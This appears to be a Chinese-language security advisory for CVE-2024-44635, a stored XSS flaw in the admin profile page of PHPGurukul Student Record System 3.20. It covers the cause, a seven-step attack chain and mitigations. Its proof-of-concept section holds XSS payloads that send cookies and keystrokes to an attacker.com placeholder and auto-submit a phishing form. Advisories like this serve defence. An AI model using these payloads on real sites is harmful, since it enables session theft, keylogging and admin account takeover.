CVE-2024-44635 PHPGurukul学生记录系统存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2024-44635

漏洞类型

XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

PHPGurukul Student Record System 3.20

漏洞概述

CVE-2024-44635是PHPGurukul学生记录系统3.20版本中存在的一个存储型跨站脚本攻击（Stored XSS）漏洞。该漏洞位于管理员个人资料管理页面（admin-profile.php），攻击者可以通过在adminname（管理员姓名）和aemailid（管理员邮箱）参数中注入恶意JavaScript代码来实现持久化的客户端攻击。由于该漏洞属于存储型XSS，恶意脚本会被永久存储在服务器端数据库中，所有访问该管理员资料页面的用户都会自动执行攻击者植入的恶意代码。根据CVSS 3.1评分标准，该漏洞的评分为6.1，属于中等严重程度。攻击向量为网络传播，无需特殊权限，但需要用户交互才能触发。攻击成功后，攻击者可以窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或传播恶意软件。由于学生记录系统通常包含学生个人信息，该漏洞可能导致大规模敏感数据泄露，对教育机构的信息安全构成严重威胁。

技术细节

该漏洞的根本原因在于admin-profile.php页面在处理adminname和aemailid参数时缺乏充分的输入验证和输出编码。攻击者可以在管理员资料更新功能中注入包含<script>标签的恶意JavaScript代码，例如：<script>alert(document.cookie)</script>。由于应用程序未对用户输入进行HTML实体编码，这些恶意脚本会被直接存储到数据库中。当其他管理员或用户访问该资料页面时，服务器会从数据库中检索并输出这些未经过滤的数据，导致浏览器将其作为可执行脚本解析。攻击者利用此漏洞可以构造复杂的攻击链：首先通过XSS获取受害者的会话令牌，然后利用窃取的会话冒充合法管理员身份进行操作，包括修改系统配置、添加恶意管理员账户或访问敏感学生数据。该漏洞的技术特点包括：攻击代码存储在服务器端，持久性强；影响所有访问该页面的用户；利用条件简单，只需诱导用户访问特定页面即可触发。防御此类漏洞需要采用多层防护策略，包括输入验证、输出编码和内容安全策略（CSP）的综合应用。

攻击链分析

STEP 1

Reconnaissance

攻击者首先识别目标系统版本，确认其为PHPGurukul Student Record System 3.20，并定位到存在漏洞的admin-profile.php管理页面

STEP 2

Payload Preparation

攻击者准备恶意XSS payload，通常使用<script>标签包裹的JavaScript代码，用于窃取cookie、记录键盘输入或重定向用户

STEP 3

Initial Exploitation

攻击者以管理员身份登录系统，访问admin-profile.php页面，在adminname或aemailid参数中提交包含恶意脚本的输入数据

STEP 4

Persistence

由于应用程序缺乏输入过滤，恶意脚本被永久存储到数据库中，成为系统的一部分

STEP 5

Trigger

当其他管理员或用户访问该管理员资料页面时，服务器从数据库读取并输出未经过滤的数据，触发浏览器执行恶意脚本

STEP 6

Data Exfiltration

恶意脚本执行后，窃取用户会话cookie、键盘记录或其他敏感信息，并通过HTTP请求发送到攻击者控制的服务器

STEP 7

Account Takeover

攻击者利用窃取的会话令牌冒充合法管理员，执行未授权操作，如修改系统配置、访问学生数据或提升权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

POST /admin-profile.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded adminname=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>&[email protected]&submit=  <script> var cookie = document.cookie; var img = new Image(); img.src = 'https://attacker.com/log?cookie=' + encodeURIComponent(cookie); </script>  <script> document.onkeypress = function(e) { fetch('https://attacker.com/keylog?k=' + e.key); } </script>  <script> document.body.innerHTML += '<form action="https://attacker.com/phish" method="POST" id="phish"><input name="pwd"></form>'; document.getElementById('phish').submit(); </script>

影响范围

PHPGurukul Student Record System 3.20

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制admin-profile.php页面的访问权限，仅允许受信任的管理员访问；2）在Web服务器层面配置输入过滤规则，拒绝包含<script>标签等XSS特征的请求；3）启用浏览器的XSS过滤器功能；4）对敏感操作实施额外的双因素认证机制；5）加强会话管理，设置较短的会话超时时间并定期刷新会话令牌；6）监控日志中的异常请求模式，及时发现潜在的利用尝试。建议在测试环境中验证缓解措施的有效性后再部署到生产环境。